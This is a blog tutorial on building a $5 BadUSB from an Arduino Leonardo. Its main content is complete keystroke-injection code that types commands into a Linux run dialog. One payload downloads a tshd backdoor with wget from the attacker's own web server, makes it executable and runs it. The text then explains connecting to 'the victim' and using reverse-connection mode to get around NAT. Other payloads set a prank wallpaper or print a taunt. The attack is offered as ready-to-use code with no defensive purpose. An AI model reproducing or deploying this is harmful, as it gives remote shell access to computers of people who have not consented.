This page looks best with JavaScript enabled

Quacked

 ·  🎃 kr0m

BadUsbs are in fashion since the appearance of the rubber-ducky. This USB is capable of interpreting very simple scripts and executing keyboard keystrokes on the host. In this article, we will create a BadUsb without scripting capabilities, which will give us greater control since we will use Arduino’s keyboard libraries directly. Additionally, it will cost us $5 instead of $45, which is what they ask for the RubberDucky.

The first step is to get the correct hardware, which is an Arduino Leonardo inside a metal box pretending to be a USB. We can buy it on Aliexpress for the modest price of $5:

AliExpress - BadUsb

The next step is to download the Arduino IDE:
https://www.arduino.cc/en/Main/Software

Now, the keyboard libraries with support for Spanish:

cd ArduinoDIRECTORY/libraries/
git clone https://github.com/ernesto-xload/arduino_keyboardlib.git

vi arduino_keyboardlib/src/Keyboard.h

#define kbd_es_es

With all of this, we are now ready for action. As an example, we can take this code:

// https://www.arduino.cc/en/Reference/KeyboardModifiers

#define TSH 0
#define WALLMATE 1
#define AWESOME 2

#include "Keyboard.h"

// change this to match your payload:
int platform = TSH;

void setup() {
  Keyboard.begin();
}

void loop() {
  // necessary for SO to recognize keyboard
  delay(3000);

  switch (platform) {
    case TSH:
      // Download tshd binary
      Keyboard.press(KEY_LEFT_ALT);
      delay(100);
      Keyboard.press(KEY_F2);
      delay(100);
      Keyboard.release(KEY_F2);
      delay(100);
      Keyboard.release(KEY_LEFT_ALT);
      delay(100);
      // RX4 ~/tsh-0.6> python -m SimpleHTTPServer 8888
      Keyboard.print("wget 192.168.20.114:8888/tshd -O /tmp/tshd");
      for (int i=0; i <= 7; i++){
        Keyboard.press(KEY_TAB);
        Keyboard.release(KEY_TAB);
      }
      Keyboard.press(KEY_RETURN);
      Keyboard.release(KEY_RETURN);
      delay(2000);
      
      // Assign permissions
      Keyboard.press(KEY_LEFT_ALT);
      delay(100);
      Keyboard.press(KEY_F2);
      delay(100);
      Keyboard.release(KEY_F2);
      delay(100);
      Keyboard.release(KEY_LEFT_ALT);
      delay(100);
      Keyboard.print("chmod 777 /tmp/tshd");
      for (int i=0; i <= 7; i++){
        Keyboard.press(KEY_TAB);
        Keyboard.release(KEY_TAB);
      }
      Keyboard.press(KEY_RETURN);
      Keyboard.release(KEY_RETURN);
      delay(2000);
      
      // Execute fucking awesome tool
      Keyboard.press(KEY_LEFT_ALT);
      delay(100);
      Keyboard.press(KEY_F2);
      delay(100);
      Keyboard.release(KEY_F2);
      delay(100);
      Keyboard.release(KEY_LEFT_ALT);
      delay(100);
      Keyboard.print("/tmp/tshd");
      for (int i=0; i <= 7; i++){
        Keyboard.press(KEY_TAB);
        Keyboard.release(KEY_TAB);
      }
      Keyboard.press(KEY_RETURN);
      Keyboard.release(KEY_RETURN);
      delay(2000);
      
      break;
    case WALLMATE:
      // Download image
      Keyboard.press(KEY_LEFT_ALT);
      delay(100);
      Keyboard.press(KEY_F2);
      delay(100);
      Keyboard.release(KEY_F2);
      delay(100);
      Keyboard.release(KEY_LEFT_ALT);
      delay(100);
      Keyboard.print("wget https://i.imgflip.com/1dv8ac.jpg -O /tmp/quacked.jpg");
      delay(1000);
      /*for (int i=0; i <= 1; i++){
        Keyboard.press(KEY_TAB);
        Keyboard.release(KEY_TAB);
      }
      Keyboard.write(' ');*/
      for (int i=0; i <= 7; i++){
        Keyboard.press(KEY_TAB);
        Keyboard.release(KEY_TAB);
      }
      Keyboard.press(KEY_RETURN);
      Keyboard.release(KEY_RETURN);
      delay(2000);

      // Set wallpaper
      Keyboard.press(KEY_LEFT_ALT);
      delay(100);
      Keyboard.press(KEY_F2);
      delay(100);
      Keyboard.release(KEY_F2);
      delay(100);
      Keyboard.release(KEY_LEFT_ALT);
      delay(100);
      Keyboard.print("gsettings set org.mate.background picture-filename '/tmp/quacked.jpg'");
      delay(1000);
      /*for (int i=0; i <= 1; i++){
        Keyboard.press(KEY_TAB);
        Keyboard.release(KEY_TAB);
      }
      Keyboard.write(' ');*/
      for (int i=0; i <= 7; i++){
        Keyboard.press(KEY_TAB);
        Keyboard.release(KEY_TAB);
      }
      Keyboard.press(KEY_RETURN);
      Keyboard.release(KEY_RETURN);
      
      break;
    case AWESOME:
      Keyboard.press(KEY_LEFT_GUI);
      Keyboard.write(KEY_RETURN);
      delay(1000);
      Keyboard.releaseAll();
      Keyboard.print("You have been Kr0med!!");
  }

  // do nothing:
  while (true);
}

Depending on the chosen payload, the USB will execute different actions. For the tsh payload, we must have our tsh compiled and start a web server so that wget can download the binary:

wget https://packetstormsecurity.com/files/download/31650/tsh-0.6.tgz
tar xvzf tsh-0.6.tgz
cd tsh-0.6
make linux

We start the web server:

python -m SimpleHTTPServer 8888

Now, when the binary is downloaded, an entry will appear in the console where we launched the web server, allowing us to connect with the victim. If the victim is behind a NAT, this obviously won’t work. What we can do is compile tsh in “reverse connection” mode so that it will be the victim who connects with us, bypassing the NAT.

If you liked the article, you can treat me to a RedBull here